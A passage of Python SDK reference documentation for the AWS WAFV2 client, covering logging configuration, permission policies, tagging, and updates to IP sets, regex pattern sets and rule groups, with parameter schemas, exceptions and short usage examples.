perform.\n\n\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
Response Structure
(dict) --
LoggingConfiguration (dict) --
ResourceArn (string) --The Amazon Resource Name (ARN) of the web ACL that you want to associate with LogDestinationConfigs .
LogDestinationConfigs (list) --The Amazon Kinesis Data Firehose Amazon Resource Name (ARNs) that you want to associate with the web ACL.
(string) --
RedactedFields (list) --The parts of the request that you want to keep out of the logs. For example, if you redact the cookie field, the cookie field in the firehose will be xxx .
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The part of a web request that you want AWS WAF to inspect. Include the single FieldToMatch type that you want to inspect, with additional specifications as needed, according to the type. You specify a single request component in FieldToMatch for each rule statement that requires it. To inspect more than one component of a web request, create a separate rule statement for each component.
SingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --The name of the query header to inspect.
SingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --The name of the query argument to inspect.
AllQueryArguments (dict) --Inspect all query arguments.
UriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFServiceLinkedRoleErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'LoggingConfiguration': {
'ResourceArn': 'string',
'LogDestinationConfigs': [
'string',
],
'RedactedFields': [
{
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
]
}
}
:returns:
Associate that firehose to your web ACL using a PutLoggingConfiguration request.
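As a hedged illustration (the web ACL and delivery stream ARNs are placeholders; AWS WAF expects the Kinesis Data Firehose delivery stream name to start with aws-waf-logs-), a minimal call that redacts the Authorization header and the query string from the logs:
    response = client.put_logging_configuration(
        LoggingConfiguration={
            'ResourceArn': 'arn:aws:wafv2:us-east-1:123456789012:regional/webacl/my-acl/abcd-1234',
            'LogDestinationConfigs': [
                'arn:aws:firehose:us-east-1:123456789012:deliverystream/aws-waf-logs-example'
            ],
            # Redacted fields appear as xxx in the delivered log records.
            'RedactedFields': [
                {'SingleHeader': {'Name': 'authorization'}},
                {'QueryString': {}}
            ]
        }
    )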
"""
pass
def put_permission_policy(ResourceArn=None, Policy=None):
"""
Attaches an IAM policy to the specified resource. Use this to share a rule group across accounts.
You must be the owner of the rule group to perform this operation.
This action is subject to the following restrictions:
You can attach only one policy with each PutPermissionPolicy request.
The ARN in the request must be a valid WAF RuleGroup ARN and the rule group must exist in the same region.
The user making the request must be the owner of the rule group.
See also: AWS API Documentation
Exceptions
:example: response = client.put_permission_policy(
ResourceArn='string',
Policy='string'
)
:type ResourceArn: string
:param ResourceArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the RuleGroup to which you want to attach the policy.\n
:type Policy: string
:param Policy: [REQUIRED]\nThe policy to attach to the specified rule group.\nThe policy specifications must conform to the following:\n\nThe policy must be composed using IAM Policy version 2012-10-17 or version 2015-01-01.\nThe policy must include specifications for Effect , Action , and Principal .\nEffect must specify Allow .\nAction must specify wafv2:CreateWebACL , wafv2:UpdateWebACL , and wafv2:PutFirewallManagerRuleGroups . AWS WAF rejects any extra actions or wildcard actions in the policy.\nThe policy must not include a Resource parameter.\n\nFor more information, see IAM Policies .\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFInvalidPermissionPolicyException
:return: {}
:returns:
ResourceArn (string) -- [REQUIRED]
The Amazon Resource Name (ARN) of the RuleGroup to which you want to attach the policy.
Policy (string) -- [REQUIRED]
The policy to attach to the specified rule group.
The policy specifications must conform to the following:
The policy must be composed using IAM Policy version 2012-10-17 or version 2015-01-01.
The policy must include specifications for Effect , Action , and Principal .
Effect must specify Allow .
Action must specify wafv2:CreateWebACL , wafv2:UpdateWebACL , and wafv2:PutFirewallManagerRuleGroups . AWS WAF rejects any extra actions or wildcard actions in the policy.
The policy must not include a Resource parameter.
For more information, see IAM Policies .
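A hedged sketch of a conforming policy (the account ID and rule group ARN are placeholders); it grants only the three actions listed above and omits a Resource element, per the restrictions:
    import json
    policy = {
        'Version': '2012-10-17',
        'Statement': [{
            'Effect': 'Allow',
            # The principal is the account you want to share the rule group with.
            'Principal': {'AWS': 'arn:aws:iam::111122223333:root'},
            'Action': [
                'wafv2:CreateWebACL',
                'wafv2:UpdateWebACL',
                'wafv2:PutFirewallManagerRuleGroups'
            ]
        }]
    }
    response = client.put_permission_policy(
        ResourceArn='arn:aws:wafv2:us-east-1:123456789012:regional/rulegroup/my-group/abcd-1234',
        Policy=json.dumps(policy)
    )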
"""
pass
def tag_resource(ResourceARN=None, Tags=None):
"""
Associates tags with the specified AWS resource. Tags are key:value pairs that you can associate with AWS resources. For example, the tag key might be "customer" and the tag value might be "companyA." You can specify one or more tags to add to each AWS resource. You can add up to 50 tags to each AWS resource.
See also: AWS API Documentation
Exceptions
:example: response = client.tag_resource(
ResourceARN='string',
Tags=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:type Tags: list
:param Tags: [REQUIRED]\nAn array of key:value pairs to associate with the resource.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA collection of key:value pairs associated with an AWS resource. The key:value pair can be anything you define. Typically, the tag key represents a category (such as 'environment') and the tag value represents a specific value within that category (such as 'test,' 'development,' or 'production'). You can add up to 50 tags to each AWS resource.\n\nKey (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag key to describe a category of information, such as 'customer.' Tag keys are case-sensitive.\n\nValue (string) -- [REQUIRED]Part of the key:value pair that defines a tag. You can use a tag value to describe a specific value within a category, such as 'companyA' or 'companyB.' Tag values are case-sensitive.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
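For example (the rule group ARN is a placeholder), tagging a resource with the 'environment' category described above:
    response = client.tag_resource(
        ResourceARN='arn:aws:wafv2:us-east-1:123456789012:regional/rulegroup/my-group/abcd-1234',
        Tags=[{'Key': 'environment', 'Value': 'production'}]
    )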
"""
pass
def untag_resource(ResourceARN=None, TagKeys=None):
"""
Disassociates tags from an AWS resource. Tags are key:value pairs that you can associate with AWS resources. For example, the tag key might be "customer" and the tag value might be "companyA." You can specify one or more tag keys to remove from a resource. You can add up to 50 tags to each AWS resource.
See also: AWS API Documentation
Exceptions
:example: response = client.untag_resource(
ResourceARN='string',
TagKeys=[
'string',
]
)
:type ResourceARN: string
:param ResourceARN: [REQUIRED]\nThe Amazon Resource Name (ARN) of the resource.\n
:type TagKeys: list
:param TagKeys: [REQUIRED]\nAn array of keys identifying the tags to disassociate from the resource.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFTagOperationException
WAFV2.Client.exceptions.WAFTagOperationInternalErrorException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {}
:returns:
(dict) --
"""
pass
def update_ip_set(Name=None, Scope=None, Id=None, Description=None, Addresses=None, LockToken=None):
"""
Updates the specified IPSet .
See also: AWS API Documentation
Exceptions
:example: response = client.update_ip_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
Addresses=[
'string',
],
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the IP set. You cannot change the name of an IPSet after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the IP set that helps with identification. You cannot change the description of an IP set after you create it.
:type Addresses: list
:param Addresses: [REQUIRED]\nContains an array of strings that specify one or more IP addresses or blocks of IP addresses in Classless Inter-Domain Routing (CIDR) notation. AWS WAF supports all address ranges for IP versions IPv4 and IPv6.\nExamples:\n\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 192.0.2.44, specify 192.0.2.44/32 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses from 192.0.2.0 to 192.0.2.255, specify 192.0.2.0/24 .\nTo configure AWS WAF to allow, block, or count requests that originated from the IP address 1111:0000:0000:0000:0000:0000:0000:0111, specify 1111:0000:0000:0000:0000:0000:0000:0111/128 .\nTo configure AWS WAF to allow, block, or count requests that originated from IP addresses 1111:0000:0000:0000:0000:0000:0000:0000 to 1111:0000:0000:0000:ffff:ffff:ffff:ffff, specify 1111:0000:0000:0000:0000:0000:0000:0000/64 .\n\nFor more information about CIDR notation, see the Wikipedia entry Classless Inter-Domain Routing .\n\n(string) --\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
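Because updates require the current LockToken, a typical flow is get-then-update; a hedged sketch (the set name, ID, and addresses are placeholders):
    # Retrieve the current state to obtain a fresh lock token.
    current = client.get_ip_set(Name='my-ip-set', Scope='REGIONAL', Id='abcd-1234')
    response = client.update_ip_set(
        Name='my-ip-set',
        Scope='REGIONAL',
        Id='abcd-1234',
        Addresses=['192.0.2.0/24'],
        LockToken=current['LockToken']
    )
    # Use NextLockToken for any subsequent update.
    print(response['NextLockToken'])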
"""
pass
def update_regex_pattern_set(Name=None, Scope=None, Id=None, Description=None, RegularExpressionList=None, LockToken=None):
"""
Updates the specified RegexPatternSet .
See also: AWS API Documentation
Exceptions
:example: response = client.update_regex_pattern_set(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
RegularExpressionList=[
{
'RegexString': 'string'
},
],
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the set. You cannot change the name after you create the set.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the set. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the set that helps with identification. You cannot change the description of a set after you create it.
:type RegularExpressionList: list
:param RegularExpressionList: [REQUIRED]\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single regular expression. This is used in a RegexPatternSet .\n\nRegexString (string) --The string representing the regular expression.\n\n\n\n\n
:type LockToken: string
:param LockToken: [REQUIRED]\nA token used for optimistic locking. AWS WAF returns a token to your get and list requests, to mark the state of the entity at the time of the request. To make changes to the entity associated with the token, you provide the token to operations like update and delete. AWS WAF uses the token to ensure that no changes have been made to the entity since you last retrieved it. If a change has been made, the update fails with a WAFOptimisticLockException . If this happens, perform another get, and use the new token returned by that operation.\n
:rtype: dict
ReturnsResponse Syntax
{
'NextLockToken': 'string'
}
Response Structure
(dict) --
NextLockToken (string) --
A token used for optimistic locking. AWS WAF returns this token to your update requests. You use NextLockToken in the same manner as you use LockToken .
Exceptions
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
:return: {
'NextLockToken': 'string'
}
:returns:
WAFV2.Client.exceptions.WAFInternalErrorException
WAFV2.Client.exceptions.WAFInvalidParameterException
WAFV2.Client.exceptions.WAFNonexistentItemException
WAFV2.Client.exceptions.WAFDuplicateItemException
WAFV2.Client.exceptions.WAFOptimisticLockException
WAFV2.Client.exceptions.WAFLimitsExceededException
WAFV2.Client.exceptions.WAFInvalidOperationException
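The same get-then-update pattern applies here; note that, under the usual WAF update semantics, RegularExpressionList appears to replace the prior list in full rather than append to it (set name and ID are placeholders):
    current = client.get_regex_pattern_set(Name='my-patterns', Scope='REGIONAL', Id='abcd-1234')
    response = client.update_regex_pattern_set(
        Name='my-patterns',
        Scope='REGIONAL',
        Id='abcd-1234',
        RegularExpressionList=[{'RegexString': '^/admin/'}],
        LockToken=current['LockToken']
    )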
"""
pass
def update_rule_group(Name=None, Scope=None, Id=None, Description=None, Rules=None, VisibilityConfig=None, LockToken=None):
"""
Updates the specified RuleGroup .
A rule group defines a collection of rules to inspect and control web requests that you can use in a WebACL . When you create a rule group, you define an immutable capacity limit. If you update a rule group, you must stay within the capacity. This allows others to reuse the rule group with confidence in its capacity requirements.
See also: AWS API Documentation
Exceptions
:example: response = client.update_rule_group(
Name='string',
Scope='CLOUDFRONT'|'REGIONAL',
Id='string',
Description='string',
Rules=[
{
'Name': 'string',
'Priority': 123,
'Statement': {
'ByteMatchStatement': {
'SearchString': b'bytes',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
],
'PositionalConstraint': 'EXACTLY'|'STARTS_WITH'|'ENDS_WITH'|'CONTAINS'|'CONTAINS_WORD'
},
'SqliMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'XssMatchStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'SizeConstraintStatement': {
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {},
'UriPath': {},
'QueryString': {},
'Body': {},
'Method': {}
},
'ComparisonOperator': 'EQ'|'NE'|'LE'|'LT'|'GE'|'GT',
'Size': 123,
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'GeoMatchStatement': {
'CountryCodes': [
'AF'|'AX'|'AL'|'DZ'|'AS'|'AD'|'AO'|'AI'|'AQ'|'AG'|'AR'|'AM'|'AW'|'AU'|'AT'|'AZ'|'BS'|'BH'|'BD'|'BB'|'BY'|'BE'|'BZ'|'BJ'|'BM'|'BT'|'BO'|'BQ'|'BA'|'BW'|'BV'|'BR'|'IO'|'BN'|'BG'|'BF'|'BI'|'KH'|'CM'|'CA'|'CV'|'KY'|'CF'|'TD'|'CL'|'CN'|'CX'|'CC'|'CO'|'KM'|'CG'|'CD'|'CK'|'CR'|'CI'|'HR'|'CU'|'CW'|'CY'|'CZ'|'DK'|'DJ'|'DM'|'DO'|'EC'|'EG'|'SV'|'GQ'|'ER'|'EE'|'ET'|'FK'|'FO'|'FJ'|'FI'|'FR'|'GF'|'PF'|'TF'|'GA'|'GM'|'GE'|'DE'|'GH'|'GI'|'GR'|'GL'|'GD'|'GP'|'GU'|'GT'|'GG'|'GN'|'GW'|'GY'|'HT'|'HM'|'VA'|'HN'|'HK'|'HU'|'IS'|'IN'|'ID'|'IR'|'IQ'|'IE'|'IM'|'IL'|'IT'|'JM'|'JP'|'JE'|'JO'|'KZ'|'KE'|'KI'|'KP'|'KR'|'KW'|'KG'|'LA'|'LV'|'LB'|'LS'|'LR'|'LY'|'LI'|'LT'|'LU'|'MO'|'MK'|'MG'|'MW'|'MY'|'MV'|'ML'|'MT'|'MH'|'MQ'|'MR'|'MU'|'YT'|'MX'|'FM'|'MD'|'MC'|'MN'|'ME'|'MS'|'MA'|'MZ'|'MM'|'NA'|'NR'|'NP'|'NL'|'NC'|'NZ'|'NI'|'NE'|'NG'|'NU'|'NF'|'MP'|'NO'|'OM'|'PK'|'PW'|'PS'|'PA'|'PG'|'PY'|'PE'|'PH'|'PN'|'PL'|'PT'|'PR'|'QA'|'RE'|'RO'|'RU'|'RW'|'BL'|'SH'|'KN'|'LC'|'MF'|'PM'|'VC'|'WS'|'SM'|'ST'|'SA'|'SN'|'RS'|'SC'|'SL'|'SG'|'SX'|'SK'|'SI'|'SB'|'SO'|'ZA'|'GS'|'SS'|'ES'|'LK'|'SD'|'SR'|'SJ'|'SZ'|'SE'|'CH'|'SY'|'TW'|'TJ'|'TZ'|'TH'|'TL'|'TG'|'TK'|'TO'|'TT'|'TN'|'TR'|'TM'|'TC'|'TV'|'UG'|'UA'|'AE'|'GB'|'US'|'UM'|'UY'|'UZ'|'VU'|'VE'|'VN'|'VG'|'VI'|'WF'|'EH'|'YE'|'ZM'|'ZW',
]
},
'RuleGroupReferenceStatement': {
'ARN': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
},
'IPSetReferenceStatement': {
'ARN': 'string'
},
'RegexPatternSetReferenceStatement': {
'ARN': 'string',
'FieldToMatch': {
'SingleHeader': {
'Name': 'string'
},
'SingleQueryArgument': {
'Name': 'string'
},
'AllQueryArguments': {}
,
'UriPath': {}
,
'QueryString': {}
,
'Body': {}
,
'Method': {}
},
'TextTransformations': [
{
'Priority': 123,
'Type': 'NONE'|'COMPRESS_WHITE_SPACE'|'HTML_ENTITY_DECODE'|'LOWERCASE'|'CMD_LINE'|'URL_DECODE'
},
]
},
'RateBasedStatement': {
'Limit': 123,
'AggregateKeyType': 'IP',
'ScopeDownStatement': {'... recursive ...'}
},
'AndStatement': {
'Statements': [
{'... recursive ...'},
]
},
'OrStatement': {
'Statements': [
{'... recursive ...'},
]
},
'NotStatement': {
'Statement': {'... recursive ...'}
},
'ManagedRuleGroupStatement': {
'VendorName': 'string',
'Name': 'string',
'ExcludedRules': [
{
'Name': 'string'
},
]
}
},
'Action': {
'Block': {}
,
'Allow': {}
,
'Count': {}
},
'OverrideAction': {
'Count': {}
,
'None': {}
},
'VisibilityConfig': {
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
}
},
],
VisibilityConfig={
'SampledRequestsEnabled': True|False,
'CloudWatchMetricsEnabled': True|False,
'MetricName': 'string'
},
LockToken='string'
)
:type Name: string
:param Name: [REQUIRED]\nThe name of the rule group. You cannot change the name of a rule group after you create it.\n
:type Scope: string
:param Scope: [REQUIRED]\nSpecifies whether this is for an AWS CloudFront distribution or for a regional application. A regional application can be an Application Load Balancer (ALB) or an API Gateway stage.\nTo work with CloudFront, you must also specify the Region US East (N. Virginia) as follows:\n\nCLI - Specify the Region when you use the CloudFront scope: --scope=CLOUDFRONT --region=us-east-1 .\nAPI and SDKs - For all calls, use the Region endpoint us-east-1.\n\n
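For example, with Scope='CLOUDFRONT' the boto3 client itself has to target the us-east-1 endpoint, as described above; a minimal sketch (the regional Region shown is only an illustration):

import boto3

# CLOUDFRONT-scoped rule groups are managed through US East (N. Virginia);
# REGIONAL rule groups use the Region of the ALB or API Gateway stage they protect.
cloudfront_client = boto3.client('wafv2', region_name='us-east-1')
regional_client = boto3.client('wafv2', region_name='eu-west-1')  # any regional endpoint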
:type Id: string
:param Id: [REQUIRED]\nA unique identifier for the rule group. This ID is returned in the responses to create and list commands. You provide it to operations like update and delete.\n
:type Description: string
:param Description: A description of the rule group that helps with identification. You cannot change the description of a rule group after you create it.
:type Rules: list
:param Rules: The Rule statements used to identify the web requests that you want to allow, block, or count. Each rule includes one top-level statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nA single rule, which you can use in a WebACL or RuleGroup to identify web requests that you want to allow, block, or count. Each rule includes one top-level Statement that AWS WAF uses to identify matching web requests, and parameters that govern how AWS WAF handles them.\n\nName (string) -- [REQUIRED]The name of the rule. You can\'t change the name of a Rule after you create it.\n\nPriority (integer) -- [REQUIRED]If you define more than one Rule in a WebACL , AWS WAF evaluates each request against the Rules in order based on the value of Priority . AWS WAF processes rules with lower priority first. The priorities don\'t need to be consecutive, but they must all be different.\n\nStatement (dict) -- [REQUIRED]The AWS WAF processing statement for the rule, for example ByteMatchStatement or SizeConstraintStatement .\n\nByteMatchStatement (dict) --A rule statement that defines a string match search for AWS WAF to apply to web requests. The byte match statement provides the bytes to search for, the location in requests that you want AWS WAF to search, and other settings. The bytes to search for are typically a string that corresponds with ASCII characters. In the AWS WAF console and the developer guide, this is refered to as a string match statement.\n\nSearchString (bytes) -- [REQUIRED]A string value that you want AWS WAF to search for. AWS WAF searches only in the part of web requests that you designate for inspection in FieldToMatch . The maximum length of the value is 50 bytes.\nValid values depend on the component that you specify for inspection in FieldToMatch :\n\nMethod : The HTTP method that you want AWS WAF to search for. This indicates the type of operation specified in the request.\nUriPath : The value that you want AWS WAF to search for in the URI path, for example, /images/daily-ad.jpg .\n\nIf SearchString includes alphabetic characters A-Z and a-z, note that the value is case sensitive.\n\nIf you\'re using the AWS WAF API\nSpecify a base64-encoded version of the value. The maximum length of the value before you base64-encode it is 50 bytes.\nFor example, suppose the value of Type is HEADER and the value of Data is User-Agent . If you want to search the User-Agent header for the value BadBot , you base64-encode BadBot using MIME base64-encoding and include the resulting value, QmFkQm90 , in the value of SearchString .\n\nIf you\'re using the AWS CLI or one of the AWS SDKs\nThe value that you want AWS WAF to search for. The SDK automatically base64 encodes the value.\n\nFieldToMatch (dict) -- [REQUIRED]The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .\n\nSingleHeader (dict) --Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.\n\nName (string) -- [REQUIRED]The name of the query header to inspect.\n\n\n\nSingleQueryArgument (dict) --Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . 
The name can be up to 30 characters long and isn\'t case sensitive.\nThis is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.\n\nName (string) -- [REQUIRED]The name of the query argument to inspect.\n\n\n\nAllQueryArguments (dict) --Inspect all query arguments.\n\nUriPath (dict) --Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .\n\nQueryString (dict) --Inspect the query string. This is the part of a URL that appears after a ? character, if any.\n\nBody (dict) --Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.\nNote that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.\n\nMethod (dict) --Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.\n\n\n\nTextTransformations (list) -- [REQUIRED]Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.\n\n(dict) --\nNote\nThis is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .\n\nText transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.\n\nPriority (integer) -- [REQUIRED]Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. 
The priorities don\'t need to be consecutive, but they must all be different.\n\nType (string) -- [REQUIRED]You can specify the following transformation types:\n\nCMD_LINE\nWhen you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:\n\nDelete the following characters: ' \' ^\nDelete spaces before the following characters: / (\nReplace the following characters with a space: , ;\nReplace multiple spaces with one space\nConvert uppercase letters (A-Z) to lowercase (a-z)\n\n\nCOMPRESS_WHITE_SPACE\nUse this option to replace the following characters with a space character (decimal 32):\n\nf, formfeed, decimal 12\nt, tab, decimal 9\nn, newline, decimal 10\nr, carriage return, decimal 13\nv, vertical tab, decimal 11\nnon-breaking space, decimal 160\n\n\nCOMPRESS_WHITE_SPACE also replaces multiple spaces with one space.HTML_ENTITY_DECODE\n\nUse this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:\n\nReplaces (ampersand)quot; with '\nReplaces (ampersand)nbsp; with a non-breaking space, decimal 160\nReplaces (ampersand)lt; with a 'less than' symbol\nReplaces (ampersand)gt; with >\nReplaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters\nReplaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding 